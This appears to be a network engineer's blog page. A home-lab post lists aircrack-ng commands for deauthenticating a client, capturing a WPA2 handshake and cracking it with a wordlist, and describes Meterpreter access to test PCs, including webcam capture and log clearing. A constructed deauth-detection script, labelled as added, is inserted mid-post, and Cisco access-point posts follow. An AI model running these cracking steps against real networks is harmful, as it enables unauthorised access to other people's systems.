So my wife wasn’t well for most of the weekend and the kids are busy doing their stuff. So I got some time to play around 🙂 on my home lab. – so here’s the thing:
It took me less than 5 mins to obtain a WPA2 handshake and less than 5 seconds to brute force the *.cap file that contained the password; post-handshake and obviously it’s only as good as your word list.
Key commands are:
airodump-ng [monitor interface]
airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
aireplay-ng -0 2 -a [router bssid] -c [client bssid] [monitor interface]
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
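From the defender's side, the deauthentication step in the commands above leaves a recognisable trace: several deauth frames aimed at one client, followed within seconds by a fresh EAPOL handshake. The detector below is an added example, not part of the original post; the event format, function names, thresholds and sample data are all constructed for illustration.

```python
from collections import defaultdict

# Constructed sample events (not from the page): time_s, frame type, BSSID, client MAC.
SAMPLE_EVENTS = """\
10.00  eapol  aa:bb:cc:00:00:01 11:22:33:00:00:0b
42.10  deauth aa:bb:cc:00:00:01 11:22:33:00:00:0a
42.15  deauth aa:bb:cc:00:00:01 11:22:33:00:00:0a
42.20  deauth aa:bb:cc:00:00:01 11:22:33:00:00:0a
44.80  eapol  aa:bb:cc:00:00:01 11:22:33:00:00:0a
44.85  eapol  aa:bb:cc:00:00:01 11:22:33:00:00:0a
90.00  deauth aa:bb:cc:00:00:01 11:22:33:00:00:0c
300.00 eapol  aa:bb:cc:00:00:01 11:22:33:00:00:0c
"""

def parse_events(text):
    """Yield (timestamp, kind, bssid, client) tuples from whitespace-separated lines."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, kind, bssid, client = line.split()
        yield float(ts), kind.lower(), bssid.lower(), client.lower()

def find_forced_handshakes(events, min_deauths=2, window_s=10.0):
    """Flag clients that re-handshake within window_s of >= min_deauths deauth frames."""
    recent = defaultdict(list)  # (bssid, client) -> deauth timestamps seen so far
    alerts = []
    for ts, kind, bssid, client in sorted(events):
        key = (bssid, client)
        if kind == "deauth":
            recent[key].append(ts)
        elif kind == "eapol":
            burst = [t for t in recent[key] if 0 <= ts - t <= window_s]
            if len(burst) >= min_deauths:
                alerts.append({"bssid": bssid, "client": client,
                               "deauths": len(burst),
                               "first_deauth": burst[0],
                               "handshake_at": ts})
            # Later EAPOL messages of the same handshake must not re-alert.
            recent[key].clear()
    return alerts

if __name__ == "__main__":
    for alert in find_forced_handshakes(parse_events(SAMPLE_EVENTS)):
        print("possible forced re-handshake:", alert)
```

A normal join with no preceding deauth, and a single deauth followed minutes later by a reconnect, are both ignored; only the deauth burst on client `...:0a` is reported.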
Further to that, and in about as much time as it took me to read up on Meterpreter, with recognition to Offensive Security, I was able to access a couple of Windows PCs on my test network. Not only was I able to access the target machines, I obtained a hashdump, took a screenshot, took remote control, opened a shell/cmd, downloaded a file and, probably the most impressive and most worrying, was able to run the remote webcam, taking a snap and a continuous stream, along with audio recording from the microphone on those target machines. Oh…. and I cleared the logs as I left the scene – all within a couple of hours.
So keep those systems secure and up to date peeps!
A quick install of Satellite Communications, using the Telstra Iterra network and SSN (Silver Spring Networks) Access Points in remote WA. One of a few APs that have to be Sat connected due to there being no 3/4G. Nevertheless it worked as expected. These SSN APs operate on both 900 MHz and 2.4 GHz, which increases the capacity and reliability of the meshed network, ultimately providing access and supporting Smart Meters, out bush.
Working in 40 degree heat with shade provided, courtesy of Horizon Power 👌🏼
Nowadays Autonomous AP deployments are rarely used, it is very hard to find quality documentation (apart from Cisco configuration guides & few support forum docs) how to configure these…
Source: Autonomous AP – Wireless Bridges
OK, I’ve just been told by Cisco TAC that the APs we purchased don’t do 2.4 GHz bridge – really ????
Doco says otherwise, keen to close the call I’d say. FFS
Configuration Guide to Aironet AP’s; and
Lightweight AP (LAP) Registration to a Wireless LAN Controller (WLC)
Getting Started Guide Cisco Aironet 1530 Outdoor Access Points
Cisco Aironet Universal AP Priming and Cisco AirProvision User Guide
Scope, Objectives and Expectations
A good guide to some of the basics with wireless bridges.
I was recently asked to design a point-2-point wireless solution which fast became a point-to-multipoint. Regardless of the design, the Access Points used were AIR-AP1532E-UXK9 with a vision of utilising the 5 GHz back-haul and a 14 dBi directional antenna to cover line-of-sight.
These UX Access Points address worldwide regulatory compliance by dynamically setting their regulatory domain/country based on their GPS location. Sounds simple, right? It is important to point out that you can’t use the 5 GHz until the AP has been provisioned, as the 5 GHz stays in Scanner mode.
However, the provisioning of these Access Points is carried out by either the Smartphone method or via WLC. I needed to use my iPhone but the Apple iPhone app was broken (confirmed by Cisco: Bug ID CSCuw28658), nor did the Android App work, but thank you Windows Smart phone :), you saved the day (never thought I would say that).
Followed the User Guide to set the domain, remembering to use WPA v2 and the default userid/password for AP provisioning and not the SSID password.
The un-provisioned AP looks like this:
The provisioned AP (to Australia/NZ), looks like this:
Got there in the end but Dear Cisco, I’m unimpressed with the process for provisioning these APs, it definitely needs improvement.
Useful documentation on OEAP